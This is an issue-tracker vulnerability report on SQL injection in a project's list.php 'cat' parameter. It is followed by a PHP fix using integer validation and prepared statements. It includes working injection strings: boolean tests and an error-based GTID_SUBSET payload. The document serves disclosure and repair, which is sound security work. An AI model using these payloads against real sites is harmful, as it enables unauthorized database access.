There is a vulnerability in your project - SQL injection #3

Open
zhutoujun opened this issue Jun 28, 2021 · 0 comments
Code Address: /list.php
Type: SQL injection error-based
Parameter: cat
Code:

exploit:
http://debug1.com//list.php?cat=1 and 1=1
http://debug1.com//list.php?cat=1 and 1=2

https://127.0.0.1/list.php?cat=1 AND GTID_SUBSET(CONCAT(0x7176707071,(SELECT (ELT(2051=2051,1))),0x716b7a7171),2051)

Repair suggestion: intercept the SQL injection request that adds the GET/POST parameter to the program, or escape or preprocess the program SQL.
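
One way to apply the repair suggestion to the `cat` parameter, as an added example that is not part of the original issue or the project's code: validate the value as an integer, then bind it in a prepared statement. The `articles` table, its columns, the `listByCategory` helper and the in-memory SQLite database are assumptions, since the real query in `list.php` is not shown on the page.

```php
<?php
// Added example with a hypothetical schema; the real list.php query is not shown in the report.
declare(strict_types=1);

// In-memory SQLite stands in for the project's database (assumption).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)');
$pdo->exec("INSERT INTO articles (cat, title) VALUES (1, 'first'), (1, 'second'), (2, 'other')");

/**
 * Return the titles in one category, or null when $rawCat is not a plain
 * positive integer. In a page handler, $rawCat would be $_GET['cat'] ?? null.
 */
function listByCategory(PDO $pdo, $rawCat): ?array
{
    // Step 1: strict validation. FILTER_VALIDATE_INT accepts only an integer
    // literal, so a value such as "1 and 1=1" never reaches the database layer.
    $cat = filter_var($rawCat, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($cat === false) {
        return null;
    }

    // Step 2: bound parameter. The SQL text is fixed and the value travels
    // separately, so it cannot change the structure of the query.
    $stmt = $pdo->prepare('SELECT title FROM articles WHERE cat = :cat ORDER BY id');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->execute();

    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: one legitimate value and the two boolean test strings from the report.
foreach (['1', '1 and 1=1', '1 and 1=2'] as $input) {
    $rows = listByCategory($pdo, $input);
    echo str_pad("cat=$input", 16), ' => ',
        $rows === null ? 'rejected (respond with HTTP 400)' : implode(', ', $rows), PHP_EOL;
}
```

Either step alone stops the reported requests; keeping both means a later change to the validation does not reopen the query.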
